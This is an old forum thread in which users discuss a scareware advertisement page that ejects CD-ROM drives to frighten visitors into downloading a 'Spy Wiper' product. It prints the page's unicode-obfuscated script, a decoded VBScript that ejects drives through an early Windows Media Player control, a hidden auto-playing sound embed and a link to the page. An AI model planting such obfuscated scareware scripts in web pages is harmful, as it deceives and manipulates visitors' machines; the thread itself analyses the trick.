What next?

[JackMDS]

For people who doubt the need for security.

The following link currently executes every time that I log to my free email service.The following link is embedded in one of the Ads and currently executes Automatically every time that I log to my free email service.

Before Clicking, make sure that you CD-Rom is not in use and that the door can be free to open.

http://default-homepage-network.com/spypop4.html

 

[minendo]

All the link does for me is play the ICQ "UH OH" received message noise. CD-Roms do not eject.

 

[Need4Speed]

Originally posted by: minendo
All the link does for me is play the ICQ "UH OH" received message noise. CD-Roms do not eject.

same here

 

[JackMDS]

The original thingie Hijacked my browser, and deposited 99 unit of infestation on my Hard Drive.

The link contains the following script. If Scripting is blocked it probably will not excute, and only loads the wav file that is in the end..

The content of the Link:

WARNING!!

If your cd-rom drive(s) open...

You DESPERATELY NEED to rid your system
of spyware pop-ups IMMEDIATELY!

Spyware programmers can control your
computer hardware if you fail to protect
your computer right at this moment!

Download Spy Wiper NOW!

<i>(See other window)</i>
</font></b></pre></table>

<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u004c\u0041\u004e\u0047\u0055\u0041\u0047\u0045\u003d\u0022\u0056\u0042\u0053\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u003c\u0021\u002d\u002d\u000d\u000a\u0053\u0065\u0074\u0020\u006f\u0057\u004d\u0050\u0020\u003d\u0020\u0043\u0072\u0065\u0061\u0074\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0057\u004d\u0050\u006c\u0061\u0079\u0065\u0072\u002e\u004f\u0043\u0058\u002e\u0037\u0022\u0020\u0029\u000d\u000a\u0053\u0065\u0074\u0020\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073\u0020\u003d\u0020\u006f\u0057\u004d\u0050\u002e\u0063\u0064\u0072\u006f\u006d\u0043\u006f\u006c\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u000d\u000a\u0069\u0066\u0020\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\u003e\u003d\u0020\u0031\u0020\u0074\u0068\u0065\u006e\u000d\u000a\u0046\u006f\u0072\u0020\u0069\u0020\u003d\u0020\u0030\u0020\u0074\u006f\u0020\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\u002d\u0020\u0031\u000d\u000a\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073\u002e\u0049\u0074\u0065\u006d\u0028\u0069\u0029\u002e\u0045\u006a\u0065\u0063\u0074\u000d\u000a\u004e\u0065\u0078\u0074\u0020\u0027\u0020\u0063\u0064\u0072\u006f\u006d\u000d\u000a\u0045\u006e\u0064\u0020\u0049\u0066\u000d\u000a\u002d\u002d\u003e\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>

<EMBED SRC=http://www.passthison.com/security/security.wav AUTOSTART=true HIDDEN=true LOOP=no>

 

[gunrunnerjohn]

It opened my CD-RW and DVD+RW drives, I guess I need their product.

 

[n0cmonkey]

Nothing happened. Stupid iBook.

 

[wallsfd949]

Nothing here, guess mozilla is broken...

 

[onelin]

I love Opera. No CDROM mishaps.

 

[reicherb]

IE6 on WinXP here using NSW and nothing happened for me. No sounds. No opened drives.

 

[stephbu]

Not decoded the embedded script but at a guess this is FUD that tests for an old version of Windows Media Player embedded control - the drive device controls were enabled in several older version.

 

[stephbu]

Yeah I was right - here's the script

<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</script>


Was fixed in a very early patch of WMP7 too.

S.

 

[gunrunnerjohn]

Makes sense, I have WMP7, but I have applied any patches that come along. Never could see the sense in WMP9, it's a real load!

 

[JackMDS]

Nah it is not WMP. I have WMP 9 on the machine.

It seems that it mainly work when none of the scripting is blocked either by the Browser or any other security program.

 

[stephbu]

Originally posted by: JackMDS
Nah it is not WMP. I have WMP 9 on the machine.

It seems that it mainly work when none of the scripting is blocked either by the Browser or any other security program.

You're right it's not WMP 9 - like I said in the mail it was an early version of WMP. (7.0 in this case)

Set oWMP = CreateObject("WMPlayer.OCX.7")